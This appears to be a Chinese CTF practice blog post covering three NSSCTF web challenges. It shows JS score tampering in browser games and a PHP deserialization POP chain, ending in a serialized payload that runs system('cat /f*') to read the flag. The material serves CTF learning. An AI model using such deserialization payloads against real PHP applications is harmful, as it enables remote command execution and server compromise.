当前位置：首页 > news >正文

nss刷题（2）

news 2025/10/24 23:19:06

1、[NSSCTF 2022 Spring Recruit]ezgame

打开题目是一个游戏界面

发现是有分数的，猜测分数达到某个之后可以获得flag，查看源码看一下

看到末尾显示分数超过65后显示flag

在js中找到了一个score,将他的值改为大于65的数后随意玩一次就可以得到flag同时，也可以直接搜索nss找到flag

2、[HNCTF 2022 Week1]2048

也是一个类似游戏的题，提示超过2000分可以输出flag，想到应该可以修改js获取

找到了输出条件和输出flag的代码，考虑是否可以直接输出

直接在控制台输出，得到flag

3、[SWPUCTF 2022 新生赛]ez_1zpop

打开后是一段代码，应该是php序列化与反序列化

    类内部：是指类定义的内部，即类名后大括号{ }内部。
    类外部：是指类定义的外部内容，即类名后大括号{}之外的所有地方。
    类成员的访问权限控制分为：内部访问(私有的private)。内部访问(受保护protected)和全部访问(公有public)。

1、public 公开的

公开的属性或函数，可在类内部、外部访问
public $name='BMW'
public function XXX{}
2、protected 受保护的

受保护的属性或函数，只能在类及其子类、父类间内部访问。若想在外部访问，需要设置引用方法。
protected $color='blue'
3、 private 私有的

私有的属性或函数，只能在当前类的内部访问，若想在外部访问，需要设置引用方法。

__construct()，类的构造函数

php中构造方法是对象创建完成后第一个被对象自动调用的方法。在每个类中都有一个构造方法，如果没有显示地声明它，那么类中都会默认存在一个没有参数且内容为空的构造方法。

1、构造方法的作用

通常构造方法被用来执行一些有用的初始化任务，如对成员属性在创建对象时赋予初始值。

2、构造方法的在类中的声明格式

function __constrct([参数列表]){

方法体 //通常用来对成员属性进行初始化赋值

}

审计代码，首先要让impo不能等于dxg，最后输出应该是在类lt的__destruct()方法中的echo。所以我们要让impo=new fin()才可以。那么就需要绕过__wakeup()中的return，然后让impo再次赋值。并且让fin中的$b->$a($title)与system('ls /')效果一样，那么就是$a为system，$title为ls /就可以了

构造payload：

<?php
error_reporting(0);

class lt
{
    public $impo ;
    public $md51 = 's878926199a';
    public $md52 = 's155964671a';

}

class fin
{
    public $a='system';
    public $url = 'https://www.ctfer.vip';
    public $title='ls /';

}
$a=new lt();
$a->impo=new fin();
echo serialize($a);

构造最终payload：

?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":2:{s:1:"a";s:6:"system";s:5:"title";s:7:"cat /f*";}s:4:"md51";a:1:{i:0;i:1;}s:4:"md52";a:1:{i:0;i:2;}}

得到最后的flag

pop链简介：

它是一种面向属性编程，常用于构造调用链的方法。在题目中的代码里找到一系列能调用的指令，并将这些指令整合成一条有逻辑的能达到恶意攻击效果的代码，就是pop链（个人理解，欢迎师傅们提出意见）在构造pop链中，魔术方法必不可少。下面将通过一个例题来说pop链是怎么构造的，以及具体构造的思路。

pop链构造：

一般的反序列化题目，存在漏洞或者能注入恶意代码的地方在魔术方法中，我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中，通过前面自动调用的方法就失效了，所以我们需要找到普通类与魔术方法之间的联系，理出一种逻辑思路，通过这种逻辑思路来构造一条pop链，从而达到攻击的目的。所以我们在做这类pop题目一定要紧盯魔术方法。

构造方式：

POP链：unserialize函数（变量可控）–>wakeup()魔术⽅法–>tostring()魔术⽅法–>get魔术⽅法–>invoke魔术⽅法–>触发Read类中的file_get⽅法–>触发file_get_contents函数读取flag.php

原文参考：CTF-PHP反序列化漏洞3-构造POP链-CSDN博客

nss刷题（2）

1、[NSSCTF 2022 Spring Recruit]ezgame

2、[HNCTF 2022 Week1]2048

3、[SWPUCTF 2022 新生赛]ez_1zpop

__construct()，类的构造函数

pop链简介：

pop链构造：

构造方式：

相关文章：

nss刷题（2）

2024 年“泰迪杯”A 题：生产线的故障自动识别与人员配置--第四题（用遗传算法解决生产线排班问题--matlab代码）

资产公物仓管理系统|实现国有资产智能化管理

实用的 Google Chrome 命令

动态规划算法：⼦数组、⼦串系列（数组中连续的⼀段）

2010年认证杯SPSSPRO杯数学建模D题(第一阶段)服务网点的分布全过程文档及程序

docker-compose 安装ZLMediaKit，ffmpeg、VLC实现推流并播放

|Python新手小白中级教程|第二十八章：面向对象编程（类定义语法私有属性类的继承与多态）（4）

vue项目基于WebRTC实现一对一音视频通话

web 基础之 HTTP 请求

嵌入式 - GPIO编程简介

8种区块链开发者必须知道的顶级编程语言！

十三、Redis哨兵模式--Sentinel

[力扣题解]1005. K 次取反后最大化的数组和

Web UI自动化测试--PO模式

Python进阶之-反射机制详解

day05-面向对象内存原理和数组

从头理解transformer，注意力机制（下）

ORA-609频繁出现在alert.log，如何解决？

JVM 类加载机制

JavaScript 中的 ES|QL：利用 Apache Arrow 工具

FastAPI 教程：从入门到实践

大模型多显卡多服务器并行计算方法与实践指南

根据万维钢·精英日课6的内容，使用AI（2025）可以参考以下方法：

Spring是如何解决Bean的循环依赖：三级缓存机制

Kafka入门-生产者

【Redis】笔记｜第8节｜大厂高并发缓存架构实战与优化

基于PHP的连锁酒店管理系统

【LeetCode】算法详解#6 ---除自身以外数组的乘积

MySQL的pymysql操作